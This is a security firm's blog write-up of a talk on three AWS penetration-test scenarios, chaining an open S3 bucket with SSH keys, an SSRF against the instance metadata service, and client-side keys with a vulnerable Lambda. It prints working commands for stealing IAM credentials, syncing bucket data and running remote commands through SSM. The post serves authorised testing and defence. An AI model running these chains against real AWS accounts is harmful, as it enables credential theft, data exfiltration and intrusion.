Getting shell and data access in AWS by chaining vulnerabilities

Riyaz Walikar
Appsecco
Published in
9 min readAug 29, 2019

--

Slides from a talk on using mis-configurations, overtly permissive IAM policies and application security vulnerabilities to get shells in AWS EC2 instances and go beyond the plane of attack. Presented at OWASP Bay Area August 2019 meetup.

Updated 3rd December 2019 — Please note: AWS released an additional security defences against the attack mentioned in this blog post. While the methods described here will work with the legacy version of Instance Meta Data Service (IMDSv1), they will be thwarted by IMDSv2. Read our extensive blog post on how to utilise AWS EC2 IMDSv2 and add the additional defences for your EC2 machines

https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650

Slides of the talk

Here are all the slides of the talk containing full commands and screenshots of the various exploitation scenarios

What was the talk about?

The talk primarily covered three scenarios that were setup using real world cases of penetration testing exercises that led to shell access and access to data beyond the EC2 instances that were compromised.

One of the scenarios is also covered in our “Breaking and Owning Applications and Servers on AWS and Azure class (discover and exploit) and in our Automated Defence training that we run at BlackHat (how to automatically defend against this vulnerability in AWS)”.

All the three scenarios and additional exploitation based scenarios are being added to our new pentester focused training titled “Attacking and Exploiting flaws in the Cloud” and will contain even more exploitation scenarios and attacks across multiple cloud providers as well.

Coming back to the talk, I covered the steps we took in our assessments to detect, exploit and gain access to resources within AWS using a step by step approach. All the scenarios were explained with commands and a live lab setup for the talk

Case 1: Misconfigured bucket to system shells

This scenario covered a case where we were able to use DNS information (something that we actively look for during our Penetration Testing exercises) to identify the naming convention of S3 buckets for an organisation. We used this information to discover additional buckets, one of which contained multiple SSH keys.

We started by looking at the target application — http://www.galaxybutter.

We queried the nameserver for galaxybutter.co and then queried the discovered nameserver for the CNAME and TXT records for the domain

dig NS galaxybutter.co
dig CNAME @ns-296.awsdns-37.com www.galaxybutter.co
dig TXT @ns-296.awsdns-37.com galaxybutter.co

For the IP address discovered in the TXT records, we ran a port scan to find visible services exposed to the Internet/our IP address

The -g80 flag sets the source port to TCP port 80 that allows, in theory, nmap to reach ports behind stateless firewalls which presume that the traffic is response to a web request sent from behind the firewall.

We saved the result to come back to it later.

The next step was to identify if there are any other buckets that follow the same naming convention as the CNAME for www.galaxybutter.co. We created a custom dictionary based on the naming convention and ran that against AWS using DigiNinja’s bucket_finder tool.

In an open bucket we found a zip file called sales-marketing-app.zip which contained what looked like multiple SSH private keys.

We attempted to login into multiple IP addresses we had discovered so far with common AWS linux usernames (ubuntu, ec2-user, root etc.) and were able to login into one of the servers.

ssh -i sales-marketing-app.pem ubuntu@54.211.12.132

Once we had SSH’ed into the server, we browsed the file system as a post exploitation requirement and found additional secrets to a RDS database server in a configuration file.

The database was not accessible from the Internet but was reachable from the EC2 instance. So we connected to it and dumped the first 5 rows of a table from within, revealing usernames and password hashes!

Essentially, giving us access to the AWS RDS from a weakly configured S3 bucket, whose naming convention was obtained using DNS enumeration.

Case 2: SSRF to Shell via IAM Policies

This scenario was very similar to the recent CapitalOne breach. We wrote a technical blogpost on what could have transpired based on available information.

An application was discovered with a login page and provided user registration capability. Post login the application allowed user’s to input a URL and the server would issue a web request on behalf of the user. Classic SSRF!

Using the SSRF we were able to query the meta-data service at http://169.254.169.254 and obtain information about the instance.

We were able to access the temporary token of a role attached to the EC2 instance using the URL

http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2serverhealthrole

We added the creds to our local AWS CLI using the following command

aws configure --profile stolencreds

As these are temporary tokens, a variable called aws_session_token also needs to be added to the ~/.aws/credentials file. This variable can also be added as an environment variable for the AWS CLI to work with the new creds.

A quick check to see if the creds are setup properly is to use the following command, much like the whoami of Linux/Windows world

aws sts get-caller-identity --profile stolencreds

The newly added credentials were then used to enumerate S3 buckets and download data from them using the following commands

aws s3 ls --profile stolencredsaws s3 ls s3://data.serverhealth-corporation --profile stolencredsaws s3 sync s3://data.serverhealth-corporation . --profile stolencreds

As the credentials were privileged, we then obtained command execution capabilities on one of the running EC2 instances within the environment using AWS SSM service

We enumerated the instances that had the AWS SSM service running using the command

aws ssm describe-instance-information — profile stolencreds

Then using the instanceid from the describe-instance-information command above, we ran the send-command and list-command-invocations to execute and read the output of ifconfig respectively.

aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencredsaws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

Essentially, an application vulnerable to a Server Side Request Forgery allowed access to the temporary credentials of an IAM role that was attached to the EC2 instance. This role had extensive permissions that allowed us to gain access to the entire AWS account of the target organisation and shell access to the EC2 instances using the AWS SSM service.

Case 3: Client-Side Keys, IAM Policies and a Vulnerable Lambda

A web application that allowed users to upload files to an S3 bucket was using privileged IAM keys in the client side JavaScript. It was possible to use these keys to query various services inside AWS. We found multiple Lambda functions in the AWS account. Downloading and analysing one of the Lambda functions led to the discovery of a code injection vulnerability that gave us access to the Lambda runtime environment.

We also enumerated the EC2 instances running within this environment and gained access to one of them using the new EC2 Instance connect for SSH access feature by AWS.

We started by looking at the client’s web app and found a functionality to upload files.

The site itself was static (hosted on S3) but it was performing dynamic actions (upload to S3). We poked around the JavaScript, as that was the only dynamic component here and discovered AWS keys in the client side JS

We added these keys to our AWS CLI and ran the Scoutsuite tool from NCC Group. The tool is available on Github at — https://github.com/nccgroup/ScoutSuite

scout --profile uploadcreds

This returned a complete picture of the AWS environment. We found that the account had multiple Lambda functions running with the AWS API Gateway added as triggers. Once such endpoint seemed to accept user input and returned the MD5 sum of the string passed as user input.

We downloaded the code for the Lambda functions using the following commands

aws lambda list-functions — profile uploadcredsaws lambda get-function --function-name lambda-name-here-from-previous-query --query 'Code.Location' --profile uploadcredswget -O lambda-function.zip url-from-previous-query --profile uploadcreds

The downloaded zip contains the code for the Lambda function.

Upon inspection, it was discovered that the code had a command injection vulnerability

Finally, to get a shell on one of the instances, to show impact, we used a relatively new feature of AWS EC2 called EC2 instance-connect short SSH access

You can read more about this feature here —https://aws.amazon.com/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/

In Closing

Some thoughts to summarise the talk were also shared with the audience

  • As we started with and if it’s evident now, the most common theme is the mis-configuration of services, insecure programming and permissions that should not have been given
  • Reconnaissance and OSINT is the key for a lot of cloud services and applications
  • When attacking apps and servers, it is important to identify key DNS, whois, IP history and sub-domain information
  • Post exploitation has no limits with the cloud. You can attack additional services, disrupt logging, make code changes to attack users — Your imagination (and the agreement with your client) is the limit
  • There are a ton of tools that security folks have written on GitHub and a lot of work is being done in the attack and exploitation areas
  • The key to learning to attack is to Setup > Break > Learn > Repeat

If you want us to take a look at your cloud hosted web applications or your cloud architecture to simulate attacks and identify weaknesses before the bad guys do, or if you want run one of our training programs for your teams, get in touch with us.

At Appsecco we provide advice, testing, training and insight around software and website security, especially anything that’s online, and its associated hosting infrastructure — Websites, e-commerce sites, online platforms, mobile technology, web-based services etc.

--

--